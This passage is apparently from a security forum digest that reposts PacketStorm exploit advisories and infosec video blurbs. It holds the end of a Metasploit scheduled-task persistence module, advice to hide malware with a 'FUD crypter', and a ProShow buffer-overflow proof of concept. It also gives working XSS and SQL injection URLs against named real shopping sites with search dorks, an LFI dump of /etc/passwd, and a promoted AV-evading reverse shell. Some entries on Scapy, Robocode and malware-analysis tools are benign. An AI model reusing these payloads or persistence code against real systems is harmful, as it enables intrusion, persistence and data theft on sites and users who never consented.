       # the time trigger.
       # Returns altered XML
       def create_trigger_event_tags(log, line, xml)
         # Fscked up XML syntax for windows event #{id} in #{log}, weird spacing
         # used to maintain natural Windows spacing for XML export
         temp_xml = "<EventTrigger>\n"
         temp_xml << "      #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0
         temp_xml << "      <Enabled>true</Enabled>\n"
         temp_xml << "      <Subscription><QueryList><Query Id=\"0\" "
         temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">"
         temp_xml << line
         temp_xml << "</Select></Query></QueryList>"
         temp_xml << "</Subscription>\n"
         temp_xml << "    </EventTrigger>"

         xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)

         return xml
       end

       ##############################################################
       # Takes the XML and a path and writes file to filesystem
       # Returns boolean for success
       def write_xml(xml, path, rexe_path)
         if file? path
           delete_file(rexe_path)
           fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
         end

         begin
           write_file(path, xml)
         rescue
           delete_file(rexe_path)
           fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}")
         end
         print_status("Successfully wrote XML file to #{path}")
       end

       ##############################################################
       # Takes path and delete file
       # Returns boolean for success
       def delete_file(path)
         begin
           file_rm(path)
         rescue
           print_warning("Could not delete file #{path}, delete manually")
         end
       end

       ##############################################################
       # Takes path and name for task and creates final task
       # Returns boolean for success
       def create_task(path, schname, rexe_path)
         # create task using XML file on victim fs
         create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")

         if create_task_response =~ /has successfully been created/
           print_good("Persistence task #{schname} created successfully")

           # Create delete commands for exe and task
           del_task = "schtasks /delete /tn \"#{schname}\" /f"
           print_status("#{"To delete task:".ljust(20)} #{del_task}")
           print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}")
           del_task << "\ndel #{rexe_path}"

           # Delete XML from victim
           delete_file(path)

           # Save info to notes DB
           report_note(:host => session.session_host,
                       :type => "host.s4u_persistance.cleanup",
                       :data => {
                         :session_num     => session.sid,
                         :stype           => session.type,
                         :desc            => session.info,
                         :platform        => session.platform,
                         :via_payload     => session.via_payload,
                         :via_exploit     => session.via_exploit,
                         :created_at      => Time.now.utc,
                         :delete_commands => del_task
                       })
         elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
           # Clean up
           delete_file(rexe_path)
           delete_file(path)
           error = "The scheduled task name is already in use"
           fail_with(Exploit::Failure::Unknown, error)
         else
           error = "Issues creating task using XML file schtasks"
           vprint_error("Error: #{create_task_response}")
           # TRIGGER values are lower case ('event'), so compare against that form
           if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "event"
             print_warning("Security log can be restricted by UAC, try a different trigger")
           end
           # Clean up
           delete_file(rexe_path)
           delete_file(path)
           fail_with(Exploit::Failure::Unknown, error)
         end
       end
     end

     Source: PacketStorm
  8. You look for a FUD crypter and encrypt the executable. Don't try to protect the 'virus' with a condom, because it won't work. With girls it's a bit harder, since they don't accept on the first try; you need to have style.
  9. I found something interesting on your blog: Link. It seems someone made a post with this title, but it was deleted (probably a rat who is banned here).
  10. Photodex ProShow Producer version 5.0.3297 suffers from a stack-based buffer overflow vulnerability. When opening a crafted transition file (.pxt) the application loads the "title" value from the pxt file. The application does not properly validate the length of the string loaded from the "title" value from the pxt file before using it in the further application context, which leads to a buffer overflow condition with possible code execution via overwritten SEH chains on Windows XP/7 32bit. Proof of concept code included.

Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product: Photodex ProShow Producer
Vendor URL: www.photodex.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2013-02-16
Date published: 2013-02-16
CVSSv2 Score: 6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE: -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from Inshell Security.

3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3297, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening a crafted transition file (.pxt) the application loads the "title" value from the pxt file. The application does not properly validate the length of the string loaded from the "title" value from the pxt file before using it in the further application context, which leads to a buffer overflow condition with possible code execution via overwritten SEH chains on Windows XP/7 32bit.

An attacker needs to force the victim to open a crafted .pxt file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in denial-of-service conditions.

5. PROOF-OF-CONCEPT (Code / Exploit)
------------------------------------
The following generated string has to be inserted into a .pxt file to trigger the vulnerability.

#!/usr/bin/python
# Writes the oversized "title" string to poc.txt; the bytes are then
# pasted into a .pxt transition file as described above.
file = "poc.txt"
junk1 = b"\x41" * 24       # filler before the overwrite
eip = b"\x42" * 4          # 4-byte overwrite value
junk2 = b"\xCC" * 50000    # padding after the overwrite
poc = junk1 + eip + junk2
try:
    print("[*] Creating exploit file...\n")
    # binary mode so \xCC is written as a single byte on Python 2 and 3
    writeFile = open(file, "wb")
    writeFile.write(poc)
    writeFile.close()
    print("[*] File successfully created!")
except:
    print("[!] Error while creating file!")

For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/47

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2013-02-16: Discovery of the vulnerability
2013-02-16: Full Disclosure because the vendor ignored previous reports.

8. REFERENCES
-------------
http://security.inshell.net/advisory/47

Source: PacketStorm
  11. Demandware Store software suffers from a cross site scripting vulnerability.

# Exploit Title: Demandware Store XSS Vulnerability
# Date: 2013-02-10
# Author: Cyb3rgh0st aka Rajat
# Vendor or Software Link: http://www.demandware.com/
# Version: n/a
# Category: webapps/php
# Google Keywords: inurl:on/demandware.store/ or inurl:default/Search-Show?q=
# Tested on: Windows 7 and Backtrack rc3

#POC:
http://www.example.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q={/exploit/XSS}
exploit="1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E" (without quotes)

# Demo site:
1. http://www.crocs.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
2. http://www.sorel.com/on/demandware.store/Sites-Sorel_US-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
3. http://www.cpopowermatic.com/on/demandware.store/Sites-powermatic-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script>
4. http://www.elc.co.uk/on/demandware.store/Sites-ELCENGB-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
5. http://www.jochen-schweizer.de/on/demandware.store/Sites-JSShop-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script>
6. http://www.callawaygolfpreowned.com/search/results,default,sc.html?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E

#Greetz to Team Indishell !!!

Source: PacketStorm
  12. Smoke Loader Command and Control panel suffers from local file inclusion and file deletion vulnerabilities.

Two other vulnerabilities I forgot to mention, LFI and file deletion via control.php. The user must be logged into the administrative panel.

1. LFI

GET http://evilserver.net/control.php?act=dwnshell&file=../../../../etc/passwd

Enter username for Who are you? at evilsite.net:80: eviladmin
Password:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
maniaque:x:500:500::/home/maniaque:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

2. Arbitrary file deletion

GET http://evilserver.net/control.php?act=delshell&file=../index.php

Enter username for Who are you? at evilsite.net:80: eviladmin
Password:

wget evilserver.net/index.php
HTTP request sent, awaiting response... 404 Not Found
2013-02-17 09:03:49 ERROR 404: Not Found.

The panel's C&C gateway is index.php. In older versions it was easily identifiable, as the only output it returned was "404 Error". The newer versions mask the gateway with a standard 404 Not Found page, but with a 200 status.

Source: PacketStorm
  13. 0101SHOP CMS suffers from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

.:: In The Name Of God ::.

####################################################
# 0101SHOP CMS SQL Injection Vulnerability         #
# Security Risk : High                             #
# Discovered By IRaNHaCK Security Team (MR.XpR)    #
# Our WebSite : IRaNHaCK.ORG                       #
# Tested On : XP , 7 , BackTrack                   #
# Date : 2013-02-16                                #
# Version : All                                    #
# Category : WebApp                                #
####################################################
================================================================
1- Dork : intext:"Powered by 0101HOST - Shopping Cart System."

2- Vulnerability(s) :

Target.Com/productdetails.asp?pcode=[SQL]
Target.Com/listproduct.asp?categorycode=[SQL]

3- Example :

http://llsclifestyle.com/listproduct.asp?categorycode=101%27
http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27
http://shop.honghaico.hk/listproduct.asp?categorycode=1%27
http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27

4- Admin Page :

Target.Com/adminlogin.asp
================================================================

**********************************************************************************************
We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp *
Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG *
**********************************************************************************************

./By MojiRider
./Persian Gulf For Ever

Source: PacketStorm
  14. Description: In this video I will show you how to get an HTTP shell using one Python script. This script was developed by Dave Kennedy and bypasses almost all AVs. First you need to convert the Python script into an exe, then use it on any Windows system for the reverse HTTP shell. About Script: - Contains source code and compiled binaries of a server/client reverse shell that communicates natively on HTTP channels. This shell also leverages a static AES encryption key for encrypted transport of the data. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Encrypted Http Shell
  15. Description: In this video I will show you how to use Scapy for traceroute (TCP and DNS), and also how to get a graph of the traceroute using Scapy. Scapy: Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. See the interactive tutorial and the quick demo: an interactive session (some examples may be outdated). Scapy Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Scapy Traceroute -- Tcp, Dns
  16. Description: I have a proposal to make — or rather, a proposition — to improve the overall state of security. Just as in the olden days, when swinging couples would put their house keys in a pile, and whoever drew a set of keys would go home with its owner, I suggest that security professionals do something similar (maybe with USB keyfobs or hardware tokens?). We don’t have enough empathy or understanding in this industry, and changing places with someone who does something very different from you (whether it be auditing, management, pentesting, engineering or something else) can help both personally and professionally. Think of it as job swapping — and if you’re married to your job, that’s kind of like spouse-swapping, isn’t it? Pick someone next to you and help them solve one of their security problems. You don’t even need to bring Crisco. Source: - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Shmoocon 2013 - Swinging Security Style: An Immodest Proposal
  17. Description: Source: - ShmooCon Firetalks 2013 (Hacking Illustrated Series InfoSec Tutorial Videos) Shellsquid was built out of necessity. Corporate egress controls often limit outbound connections to http (tcp/80) and https (tcp/443), often requiring the traffic to exit through a proxy. When attacking victims it is then a necessity to use reverse payloads that connect on one of these two ports and are proxy aware, the safest option being https. This is straightforward: start your listener and go. But what if you’re attacking multiple targets and want to keep them separate? What if you’re working with a team who are all attacking different targets and can’t share a listener? What are you to do? Shellsquid is meant to alleviate this issue by dynamically routing your reverse connections to a configured listener on a different port and/or machine. Teams of penetration testers can now share a single perimeter system listening over https, while routing reverse connections to internal hosts. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Shmoocon 2013 - Shellsquid: Distributed Shells With Node
  18. Description: WHAT IS ROBOCODE? Robocode is a programming game where the goal is to develop a robot battle tank to battle against other tanks in Java or .NET. The robot battles are running in real-time and on-screen. The motto of Robocode is: Build the best, destroy the rest! Besides being a programming game, Robocode is used for learning how to program, primarily in the Java language, but other languages like C# and Scala are becoming popular as well. Schools and universities are using Robocode as part of teaching how to program, but also for studying artificial intelligence (AI). The concept of Robocode is easy to understand, and a fun way to learn how to program. Robocode comes with its own installer, built-in robot editor and Java compiler, and only pre-requires a Java Virtual Machine (JVM) to exist on the system where it must be installed. Hence, everything a robot developer needs to get started is provided with the main Robocode distribution file (robocode-xxx-setup.jar). Robocode also supports developing robots using external IDEs like e.g. Eclipse, IntelliJ IDEA, NetBeans, Visual Studio etc., which supports the developer much better than the robot editor in Robocode. The fact that Robocode runs on the Java platform makes it possible to run it on any operating system with Java pre-installed, meaning that it will be able to run on Windows, Linux, Mac OS, but also UNIX and variants of UNIX. Note that Java 5.0 or newer must be installed on the system before Robocode is able to run. See the System Requirements for more information. Be aware that many users of Robocode (aka Robocoders) find Robocode to be very fun, but also very addictive. Robocode comes free of charge and is being developed as a spare-time project where no money is involved. The developers of Robocode are developing on Robocode because they think it is fun, and because they improve themselves as developers this way. 
Robocode is an Open Source project, which means that all sources are open to everybody. In addition, Robocode is provided under the terms of the EPL (Eclipse Public License). Source - http://robocode.sourceforge.net/docs/ReadMe.html Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Robocode Tutorial - Teach Your Child How To Code
  19. Description: In this episode of Tektip, we take a look at Helge's Switchblade. I apologize for the somewhat poor quality of the recording; I was attempting to make the video very fast so I didn't miss any of the Shmoocon talks. Anyways, Switchblade is a Windows application that is a toolkit for troubleshooting, analyzing, and mitigating Windows issues. Think of it as a toolkit that contains many freeware and open source tools. We were lucky enough to get a pre-release copy of version .8 to show off for this video. While I too often need to do generic Windows troubleshooting for friends and family, I always like to put a Malware Analysis spin on things when I can. So in this video I focus on how to utilize some of the tools in Switchblade to do some basic malware analysis. For me, this is a great portable malware analysis toolkit. If you want to follow along, feel free to download the malware samples I used in the downloads section. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Tektip Ep22 - Helge's Switchblade For Malware Analysis
  20. Description: Welcome to Part 9 of the Aircrack-ng Megaprimer series! In this video, I will be discussing the tool airdriver-ng, which is very useful for everything wireless-driver related on your Linux machine. For a lot of great information security videos, please visit us at SecurityTube: Welcome to SecurityTube.net As always, if you have any questions, comments or feedback, you can either leave them below, contact me via email, or follow me on Twitter: bennett@securitytube.net Twitter: @pbtomlinson Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 9: Airdriver-Ng
  21. Scripts Genie Top Sites script suffers from a remote SQL injection vulnerability.

##################################################################################
Top Sites Script, SQL Injection Vulnerabilities

Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=top_site_script
Product Page: http://www.hotscripts.com/listing/top-sites-2-2-1/
Script Demo: http://scriptsgenie.com/demo/toplist.2.11/toplist/index.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site (/out.php?id=)
>>> http://scriptsgenie.com/demo/toplist.2.11/toplist/out.php?id=20' (MySQLi Found)

Source: PacketStorm
  22. The Shopping.com API V3 PHP script suffers from a cross site scripting vulnerability.

##################################################################################
Shopping.com Api V3 php Script, XSS Vulnerabilities

Software Page: http://en.clicsell.com/script-shopping-v3.html
Product Page: http://www.hotscripts.com/listing/shopping-com-api-v3-php-script/
Script Demo: http://en.clicsell.com/

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] Xss on Demo Site (Searchbox)
>>> http://i.imgur.com/dIjfayE.png (Xss Found)
>>> If you want to try it, open the demo site and enter the XSS attack code into the Searchbox.
>>> <script>alert('XSS')</script>

Source: PacketStorm
  23. Scripts Genie Domain Trader script suffers from a remote SQL injection vulnerability.

##################################################################################
Domain Trader Script, MySQL Injection Vulnerabilities

Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=domain_trader_script_w%252Fparking
Script Demo: http://www.scriptsgenie.com/demo/trader/

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site (/catalog.php?viewdomain=now&id=)
>>> http://www.scriptsgenie.com/demo/trader/catalog.php?viewdomain=now&id=1' (MySQLi Found)

Source: PacketStorm
  24. Scripts Genie Games Site script suffers from a remote SQL injection vulnerability.

##################################################################################
Games Site Script, MySQL Injection Vulnerabilities

Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=games_site_script
Product Page: http://www.hotscripts.com/listing/150-flash-game-script-comes-with-150-games/
Script Demo: http://scriptsgenie.com/demo/GameScript150Games/

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site (/index.php?act=play&id=)
>>> http://scriptsgenie.com/demo/GameScript150Games/index.php?act=play&id=122' (MySQLi Found)

Source: PacketStorm